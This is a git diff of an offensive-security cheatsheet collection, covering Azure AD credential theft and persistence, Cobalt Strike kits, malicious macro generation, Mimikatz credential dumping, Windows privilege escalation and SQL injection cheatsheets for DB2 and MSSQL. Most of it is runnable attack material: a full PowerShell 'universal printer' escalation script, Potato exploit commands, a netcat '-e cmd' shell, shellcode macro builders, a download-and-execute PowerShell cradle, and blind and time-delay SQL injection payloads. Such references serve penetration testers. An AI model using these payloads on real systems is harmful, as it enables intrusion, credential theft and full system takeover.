### Azure AD Connect - Password extraction
Credentials in AD Sync : C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
@ -366,11 +1023,11 @@ git clone https://github.com/fox-it/adconnectdump
# DCSync with AD Sync account
## Azure AD Connect - MSOL Account's password and DCSync
### Azure AD Connect - MSOL Account's password and DCSync
You can perform **DCSync** attack using the MSOL account.
* Compromise a server with Azure AD Connect service
* Access to ADSyncAdmins or local Administrators groups
@ -384,6 +1041,8 @@ Now you can use the retrieved credentials for the MSOL Account to launch a DCSyn
> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)
> Seamless SSO is supported by both PHS and PTA. If seamless SSO is enabled, a computer account **AZUREADSSOC** is created in the on-prem AD.
:warning: The password of the AZUREADSSOACC account never changes.
Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsoftazuread-sso.com/) to convert Kerberos tickets to SAML and JWT for Office 365 & Azure
@ -406,82 +1065,16 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
7. Navigate to any web application that is integrated with our AAD domain. Fill in the user name, while leaving the password field empty.
## Azure AD - ADFS Federation Server ~Cloud Kerberos
Discover Federation Servers
* adfs
* auth
* fs
* okta
* ping
* sso
* sts
OWA Version Discovery : autodiscover.domain.com
## Azure AD - Persistence via Automation accounts
* Create a new Automation Account
* "Create Azure Run As account": Yes
* Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
* Sample runbook for this Blog located here https://github.com/NetSPI/MicroBurst
* Publish the runbook
* Add a webhook to the runbook
* Add the AzureAD module to the Automation account
* Update the Azure Automation Modules
* Assign "User Administrator" and "Subscription Owner" rights to the automation account
* Eventually lose your access…
* Trigger the webhook with a post request to create the new user
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
## Azure VM - Execute command as NT SYSTEM with Contributor right
> Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System
PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
ResourceGroupName Name
----------------- ----
PS C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Against the whole subscription using MicroBurst.ps1
Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
## Office365 - Enumerating Users
NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
* Bruteforce user enum : https://bitbucket.org/grimhacker/office365userenum/src/master/ based on the endpoint https://login.microsoftonline.com/getuserrealm.srf?login=firstname.lastname@domain.com&xml=1
RealmInfo Success="true">
* Validate email : https://github.com/LMGsec/o365creeper `o365creeper.py -f emails.txt -o validemails.txt`
* Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
## References
* [Introduction To 365-Stealer - Understanding and Executing the Illicit Consent Grant Attack](https://www.alteredsecurity.com/post/introduction-to-365-stealer)
* [Learn with @trouble1_raunak: Cloud Pentesting - Azure (Illicit Consent Grant Attack) !!](https://www.youtube.com/watch?v=51FSvndgddk&list=WL)
* [Pass-the-PRT attack and detection by Microsoft Defender for … - Derk van der Woude - Jun 9](https://derkvanderwoude.medium.com/pass-the-prt-attack-and-detection-by-microsoft-defender-for-afd7dbe83c94)
* [Azure AD Pass The Certificate - Mor - Aug 19, 2020](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
* [Get Access Tokens for Managed Service Identity on Azure App Service](https://zhiliaxu.github.io/app-service-managed-identity.html)
* [Bypassing conditional access by faking device compliance - September 06, 2020 - @DrAzureAD](https://o365blog.com/post/mdm/)
* [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
* [Get-AzurePasswords: A Tool for Dumping Credentials from Azure Subscriptions - August 28, 2018 - Karl Fosaaen](https://www.netspi.com/blog/technical/cloud-penetration-testing/get-azurepasswords/)
* [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/)
* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)
* [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/)

View File

@ -36,6 +36,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Persistence Kit](#persistence-kit)
* [Resource Kit](#resource-kit)
* [Artifact Kit](#artifact-kit)
* [Mimikatz Kit](#mimikatz-kit)
* [References](#references)
@ -402,6 +403,8 @@ beacon> spunnel_local x64 4444 C:\Payloads\msf.bin
## Kits
* [Cobalt Strike Community Kit](https://cobalt-strike.github.io/community_kit/) - Community Kit is a central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
### Elevate Kit
UAC Token Duplication : Fixed in Windows 10 Red Stone 5 (October 2018)
@ -463,6 +466,12 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
- Build the Artifact
- Cobalt Strike -> Script Manager > Load .cna
### Mimikatz Kit
* Download and extract the .tgz from the Arsenal (Note: The version uses the Mimikatz release version naming (i.e.,
* Load the mimikatz.cna aggressor script
* Use mimikatz functions as normal
## References
* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)

View File

@ -17,6 +17,7 @@
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions)
* [DOCM - winmgmts](#docm---winmgmts)
* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde)
* [DOCM - BadAssMacros](#docm---badassmacros)
* [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module)
* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec)
* [VBA Obfuscation](#vba-obfuscation)
@ -326,8 +327,7 @@ SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows
> Only the community version is available online.
* git clone https://github.com/sevagas/macro_pack
* https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe
* [https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe)
# Options
@ -385,6 +385,29 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o autopack -G sc_
echo "" "" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
## DOCM - BadAssMacros
> C# based automated Malicous Macro Generator.
* https://github.com/Inf0secRabbit/BadAssMacros
BadAssMacros.exe -h
# Create VBA for classic shellcode injection from raw shellcode
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s classic -c <caesar_shift_value> -o <path_to_output_file>
BadAssMacros.exe -i .\Desktop\payload.bin -w doc -p no -s classic -c 23 -o .\Desktop\output.txt
# Create VBA for indirect shellcode injection from raw shellcode
BadAssMacros.exe -i <path_to_raw_shellcode_file> -w <doc/excel> -p no -s indirect -o <path_to_output_file>
# List modules inside Doc/Excel file
BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -l
# Purge Doc/Excel file
BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_output_file> -m <module_name>

View File

@ -33,6 +33,7 @@ Mimikatz console (multiple commands)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest

View File

@ -3,6 +3,7 @@
## Summary
* [Tools](#tools)
* [Hide Your Binary](#hide-your-binary)
* [Disable Windows Defender](#disable-windows-defender)
* [Disable Windows Firewall](#disable-windows-firewall)
* [Simple User](#simple-user)
@ -34,6 +35,14 @@
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
## Hide Your Binary
> Sets (+) or clears (-) the Hidden file attribute. If a file uses this attribute set, you must clear the attribute before you can change any other attributes for the file.
PS> attrib +h mimikatz.exe
## Disable Windows Defender

View File

@ -35,27 +35,32 @@
* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
* [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers)
* [EoP - Printers](#eop-printers)
* [Universal Printer](#universal-printer)
* [Bring Your Own Vulnerability](#bring-your-own-vulnerability)
* [EoP - Runas](#eop---runas)
* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies)
* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges)
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
* [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
* [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver))
* [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw))
* [EoP - Privileged File Write](#eop---privileged-file-write)
* [DiagHub](#diaghub)
* [UsoDLLLoader](#usodllloader)
* [WerTrigger](#wertrigger)
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
* [MS08-067 (NetAPI)](#ms08-067-netapi)
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
* [CVE-2019-1388](#cve-2019-1388)
* [MS08-067 (NetAPI)](#ms08-067-netapi)
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
* [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
* [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
* [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
* [CVE-2019-1388](#cve-2019-1388)
* [EoP - $PATH Interception](#eop---path-interception)
* [References](#references)
@ -950,6 +955,67 @@ Citrix USB Filter Driver
## EoP - Printers
### Universal Printer
Create a Printer
$printerName = 'Universal Priv Printer'
$system32 = $env:systemroot + '\system32'
$drivers = $system32 + '\spool\drivers'
$RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName
Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll')
Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll')
Add-PrinterDriver -Name 'Generic / Text Only'
Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared
New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null
New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null
New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null
Execute the driver
$serverName = 'dc.purple.lab'
$printerName = 'Universal Priv Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'})
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
### Bring Your Own Vulnerability
Concealed Position : https://github.com/jacob-baines/concealed_position
* ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE
* RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE
* POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE
* SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE
cp_server.exe -e ACIDDAMAGE
# Get-Printer
# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
cp_client.exe -r -n ACIDDAMAGE -e ACIDDAMAGE
cp_client.exe -l -e ACIDDAMAGE
## EoP - Runas
Use the `cmdkey` to list the stored credentials on the machine.
@ -1068,7 +1134,6 @@ SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1337 -e cmd" -z
### Meterpreter getsystem and alternatives
@ -1081,8 +1146,8 @@ python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
### RottenPotato (Token Impersonation)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
* Binary available at : https://github.com/foxglovesec/RottenPotato
* Binary available at : https://github.com/breenmachine/RottenPotatoNG
@ -1101,10 +1166,12 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
### Juicy Potato (abusing the golden privileges)
### Juicy Potato (Abusing the golden privileges)
Binary available at : https://github.com/ohpe/juicy-potato/releases
:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +.
> If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato**
> If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato**
* Binary available at : https://github.com/ohpe/juicy-potato/releases
1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication)
@ -1135,6 +1202,39 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases
[+] CreateProcessWithTokenW OK
### Rogue Potato (Fake OXID Resolver)
* Binary available at https://github.com/antonioCoco/RoguePotato
# Network redirector / port forwarder to run on your remote machine, must use port 135 as src port
socat tcp-listen:135,reuseaddr,fork tcp:
# RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.
# Use this if you have fw restrictions.
RoguePotato.exe -r -e "C:\windows\system32\cmd.exe"
# RoguePotato all in one with RogueOxidResolver running locally on port 9999
RoguePotato.exe -r -e "C:\windows\system32\cmd.exe" -l 9999
#RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename
RoguePotato.exe -r -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode
### EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
* Binary available at https://github.com/zcgonvh/EfsPotato
# .NET 4.x
csc EfsPotato.cs
csc /platform:x86 EfsPotato.cs
# .NET 2.0/3.5
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs
C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs
## EoP - Privileged File Write
@ -1349,3 +1449,4 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
* [Hacking Trick: Environment Variable $Path Interception y Escaladas de Privilegios para Windows](https://www.elladodelmal.com/2020/03/hacking-trick-environment-variable-path.html?m=1)
* [Abusing SeLoadDriverPrivilege for privilege escalation - 14 - JUN - 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
* [Universal Privilege Escalation and Persistence Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/)

View File

@ -0,0 +1,208 @@
# DB2 Injection
## Summary
* [DB2 Cheatsheet](#db2-cheatsheet)
* [References](#references)
## DB2 Cheatsheet
### Version
select versionnumber, version_timestamp from sysibm.sysversions;
select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
select service_level,bld_level from sysibmadm.env_inst_info
### Comments
select blah from foo -- comment like this (double dash)
### Current User
select user from sysibm.sysdummy1
select session_user from sysibm.sysdummy1
select system_user from sysibm.sysdummy1
### List Users
DB2 uses OS accounts
select distinct(authid) from sysibmadm.privileges -- priv required
select grantee from syscat.dbauth -- incomplete results
select distinct(definer) from syscat.schemata -- more accurate
select distinct(grantee) from sysibm.systabauth -- same as previous
### List Privileges
select * from syscat.tabauth -- shows priv on tables
select * from syscat.tabauth where grantee = current user -- shows privs for current user
select * from syscat.dbauth where grantee = current user;;
select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
### List DBA Accounts
select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
### Current Database
select current server from sysibm.sysdummy1
### List Databases
select distinct(table_catalog) from sysibm.tables
SELECT schemaname FROM syscat.schemata;
### List Columns
select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
### List Tables
select table_name from sysibm.tables
select name from sysibm.systables
### Find Tables From Column Name
select tbname from sysibm.syscolumns where name='username'
### Select Nth Row
select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
### Select Nth Char
select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
### Bitwise AND/OR/NOT/XOR
select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
### ASCII Value
Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
### Char -> ASCII Value
select ascii('A') from sysibm.sysdummy1 -- returns 65
### Casting
select cast('123' as integer) from sysibm.sysdummy1
select cast(1 as char) from sysibm.sysdummy1
### String Concat
select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
### IF Statement
Seems only allowed in stored procedures. Use case logic instead.
### Case Statement
select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
### Avoiding Quotes
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
### Time Delay
Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
### Serialize to XML (for error based)
select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
### Command Execution and Local File Access
Seems it's only allowed from procedures or UDFs.
### Hostname/IP and OS INFO
select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
### Location of DB Files
select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
### System Config
select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
### Default System Database
## References
* [DB2 SQL injection cheat sheet - Adrián - 20/05/2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
* [DB2 SQL Injection Cheat Sheet - pentestmonkey](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)

View File

@ -2,9 +2,11 @@
## Summary
* [MSSQL comments](#mssql-comments)
* [MSSQL version](#mssql-version)
* [MSSQL database name](#mssql-database-name)
* [MSSQL Comments](#mssql-comments)
* [MSSQL User](#mssql-user)
* [MSSQL Version](#mssql-version)
* [MSSQL Hostname](#mssql-hostname)
* [MSSQL Database name](#mssql-database-name)
* [MSSQL List databases](#mssql-list-databases)
* [MSSQL List columns](#mssql-list-columns)
* [MSSQL List tables](#mssql-list-tables)
@ -22,7 +24,7 @@
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
* [MSSQL Trusted Links](#mssql-trusted-links)
## MSSQL comments
## MSSQL Comments
-- comment goes here
@ -33,6 +35,9 @@
SELECT user_name();
SELECT system_user;
SELECT user;
## MSSQL version
@ -41,7 +46,14 @@ SELECT CURRENT_USER
SELECT @@version
## MSSQL database name
## MSSQL Hostname
SELECT @@hostname;
## MSSQL Database name
@ -122,6 +134,13 @@ For string inputs : ' + cast((SELECT @@version) as int) + '
## MSSQL Blind based
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
@ -283,4 +302,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)

View File

@ -1004,7 +1004,9 @@ Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.wi
More JSONP endpoints available in [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
More JSONP endpoints:
* [/Intruders/jsonp_endpoint.txt](Intruders/jsonp_endpoint.txt)
* [JSONBee/jsonp.txt](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
### Bypass CSP by [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)